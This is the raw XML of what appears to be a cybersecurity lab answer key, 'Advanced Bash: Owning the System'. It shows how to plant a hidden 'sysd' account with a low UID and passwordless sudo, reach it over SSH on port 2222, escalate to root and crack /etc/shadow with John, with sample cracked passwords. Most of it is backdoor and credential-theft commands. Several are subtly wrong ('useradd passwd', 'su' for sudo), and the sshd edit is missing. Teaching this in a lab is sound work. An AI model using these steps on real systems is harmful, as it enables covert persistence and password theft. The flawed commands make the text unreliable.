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23D39" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A53DFD" w14:textId="27D8A9D8" w:rsidR="009409C0" w:rsidRPr="00426B73" w:rsidRDefault="00426B73" w:rsidP="00426B73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_vcnwtnrklmti" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Advanced Bash: Owning the System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6347EAB9" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5904B6EA" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_mo5tymjvpuij" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Step 1: Shadow People</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EA0494" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BE65E0" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B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secret user named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sysd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Make sure this user d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oesn't have a home folder created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6357207C" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0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52C4E2D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1448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useradd sysd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="663E9C3B" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AFC6CA3" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B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Give your secret user a password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E05D98" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0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02C7F78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426D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useradd passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C70157D" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F54AA3" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B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Give your secret user a system UID &lt; 1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CFAC0" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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6D9F957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5FB0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usermod -u 400 sysd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E34D3DD" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB08798" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B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Give your secret user the same GID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4EC8E7" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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08B6F7A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3B54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groupmod -g 400 sysd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E46CDD4" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D531EE6" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B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Give your secret user full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sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> access without the need for a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D53226" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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19E24D4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B86A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visudo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353CA7D4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# User privilege specification•Root ALL=(ALL:ALL) ALL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FF4A60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Sysd ALL= (ALL:ALL) NOPASSWD:ALL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D54753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#Menmber of the admin group may gain root privileges</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1E1E21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%admin ALL=(ALL)ALL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4176D62B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-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070304F8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 sysd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19BC4716" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FFCEBD" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B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Test that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sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> access works without your password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB07E4" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0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6C3FCBA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B0DD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Sudo -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66749671" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BC56A0" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51540F57" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_i9y1cjl8yrwq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Step 2: Smooth Sailing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD66EE" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C288A2" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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Edit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sshd_config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A009655" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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6C48D4F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E86F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nano /etc/ssh/sshd_config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="411E33F6" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBC3B82" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5643CD95" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_hsr7y21ghtay" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Step 3: Testing Your Configuration Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232A16D" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B679355" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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Restart the SSH service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C21AF" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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00D09E3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2671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service ssh restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E532DD3" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3811E32D" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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Exit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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21450D64" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr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5F79FC2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7936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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65CC82BF" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C0B3E6" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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SSH to the target machine using your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sysd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> account and port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2222</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C26895" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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2975BD6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D081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ssh sysd@192.168.6.105 -p 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24F0F343" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB1240F" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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Use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sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to switch to the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C141AC" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0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3AF7403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1E60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su</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A682546" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486AC259" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AEBAF5" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_3nvbopnr3b4y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Step 4: Crack All the Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44470EB0" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750B4CED" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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SSH back to the system using your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sysd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> account and port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2222</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D931BE1" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr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0D6A5AC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6347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ssh sysd@192.168.6.105 -p 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44298924" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087F05CB" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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Escalate your privileges to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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. Use John to crack the entire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/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DFCD0" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:pPr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9C0" w14:paraId="0DFFA86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76A8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John /etc/shadow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDCBC42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computer (stallman)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2F16C7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freedom (babbage)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6889B239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trustno1 (mitnik)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05871E0F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dragon (lovelace)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B98E7C3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lakers (turing)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FFF42A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passw0rd (sysadmin)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D46BE4F" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="00426B7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Goodluck! (student)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DAC1242" w14:textId="77777777" w:rsidR="009409C0" w:rsidRDefault="009409C0">
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:sectPr w:rsidR="00940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1F74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD36F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10212E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A6E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4D5E29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CEE3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4E0CEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB54E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C0"/>
    <w:rsid w:val="00426B73"/>
    <w:rsid w:val="0094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38A55"/>
  <w15:docId w15:val="{04F98258-4490-CD43-B14C-E063ABE7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2023-04-22T23:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-22T23:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>